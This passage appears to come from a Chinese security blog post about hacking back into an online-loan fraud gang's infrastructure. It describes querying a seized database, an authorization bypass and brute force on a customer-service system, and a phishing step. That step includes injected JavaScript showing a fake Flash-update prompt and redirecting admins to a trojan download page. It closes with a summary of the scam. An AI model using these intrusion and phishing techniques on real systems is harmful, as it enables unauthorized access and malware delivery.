三.客服系统控制/PC控制
3.1控制数据库
登陆mysql数据库查看诈骗嫌疑人登陆IP
杭州的电信基站动态IP,判断是家庭路由,暂无溯源价值。
3.2控制客服系统
第一套诈骗源码的客服系统使用的是网上在线客服系统
在后台翻到了客服的后台登陆地址,前端显示账号存在or密码错误,无奈账号没爆破成功。
随即笔者自己注册了该客服系统,通过adminid配合uid遍历SetCookie,越权成功,拿到客服账号。
中文账号==
爆破拿到密码
登陆客服后台
整个诈骗话术链
与受害人聊天记录
3.3使用flash钓鱼
在控制诈骗app服务器权限后,笔者使用flash钓鱼试图控制诈骗团伙个人PC。
在后台登陆成功后跳转的文件插入跳转js 跳转到事先准备好的假的flash更新页面
事先准备:免杀马一只 flash假域名一个(最好是包含有"flash"的字样)
<script>window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.flashxxxx.com";</script>
效果:
输入账号密码后登录,此时加载以上JavaScript。
点击"确认"跳转到事先伪造的flash更新页面网站,诱导下载点击。
但是最后并未上线,通过日志发现诈骗团伙是登陆了该后台的,此处也算是一个小遗憾。
四.总结
网贷诈骗类案件的典型特征是,犯罪嫌疑人以“无抵押无审核”为噱头招揽需要贷款的被害人,并以“账户冻结需做解冻”才能完成放款等名义收取保证金,又以保险费、激活费、服务费等名义再次收费。被害人为了收回之前缴纳的钱款,只能按照犯罪嫌疑人为被害人设计的整个流程,完成转款,导致被害人钱款被骗。一些急需用钱的个体经营者、消费观念超前的上班族、大学生等人群是易受骗群体。
诈骗者不仅仅将罪恶之手伸向了香港、台湾,甚至是国外......
据分析,这群诈骗团伙在巴西也进行了相同方式的诈骗,且使用的诈骗源码为以上分析第一套源码。
500余名巴西受害者。